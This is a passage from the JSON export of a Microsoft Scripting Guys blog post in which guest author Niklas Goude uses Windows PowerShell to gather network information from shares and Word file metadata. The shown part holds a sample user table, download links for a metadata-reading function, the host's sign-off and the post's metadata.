30px\">&#8212;&#8212;-&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#8212;&#8212;&#8212;&#8212;&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Jean-Luc Picard (user001)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Jean-Luc Picard (user001)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">William Riker (user002)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; William Riker (user002)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Geordi LaForge (user003)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Geordi LaForge (user003)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Worf Son of Mogh (user004)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Worf Son of Mogh (user004)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p style=\"padding-left: 30px\">Beverly Crusher (user005)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Beverly Crusher (user005)&nbsp;<\/p>\n<h2>&nbsp;Download<\/h2>\n<ul>\n<li>The <a href=\"http:\/\/gallery.technet.microsoft.com\/scriptcenter\/Get-TSWordXMetadata-8c46e79e\" target=\"_blank\">Get-TSWordXMetadata<\/a>&nbsp;function can be downloaded from the Script Center Repository.<\/li>\n<li>Additional functions and code related to security are available on the <a href=\"http:\/\/www.truesec.com\/security\/tools\" target=\"_blank\">TruSec Tools<\/a> site.<\/li>\n<\/ul>\n<p>~Niklas\nI want to thank Niklas for another very interesting blog. Join us tomorrow for another exciting blog as Security Week continues.\nI invite you to follow me on <a href=\"http:\/\/bit.ly\/scriptingguystwitter\" target=\"_blank\">Twitter<\/a> and <a href=\"http:\/\/bit.ly\/scriptingguysfacebook\" target=\"_blank\">Facebook<\/a>. If you have any questions, send email to me at <a href=\"http:\/\/blogs.technet.commailto:scripter@microsoft.com\" target=\"_blank\">scripter@microsoft.com<\/a>, or post your questions on the <a href=\"http:\/\/bit.ly\/scriptingforum\" target=\"_blank\">Official Scripting Guys Forum<\/a>. See you tomorrow. Until then, peace.<\/p>\n<p><b>Ed Wilson, Microsoft Scripting Guy<\/b>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Summary: Guest blogger, Niklas Goude, shows how to use Windows PowerShell to discover valuable network information from shares and file metadata. Microsoft Scripting Guy, Ed Wilson, is here. We now come to Part 3 of Security Week with another guest blog by Niklas Goude. Niklas Goude is a Security Consultant at TrueSec and an MVP [&hellip;]<\/p>\n","protected":false},"author":596,"featured_media":87096,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1],"tags":[56,84,183,49,3,63,185,12,45],"class_list":["post-8821","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-scripting","tag-guest-blogger","tag-microsoft-word","tag-niklas-goude","tag-office","tag-scripting-guy","tag-security","tag-shared-folders-and-mapped-drives","tag-storage","tag-windows-powershell"],"acf":[],"blog_post_summary":"<p>Summary: Guest blogger, Niklas Goude, shows how to use Windows PowerShell to discover valuable network information from shares and file metadata. Microsoft Scripting Guy, Ed Wilson, is here. We now come to Part 3 of Security Week with another guest blog by Niklas Goude. Niklas Goude is a Security Consultant at TrueSec and an MVP [&hellip;]<\/p>\n","_links":{"self":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts\/8821","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/users\/596"}],"replies":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/comments?post=8821"}],"version-history":[{"count":0,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/posts\/8821\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/media\/87096"}],"wp:attachment":[{"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/media?parent=8821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/categories?post=8821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devblogs.microsoft.com\/scripting\/wp-json\/wp\/v2\/tags?post=8821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}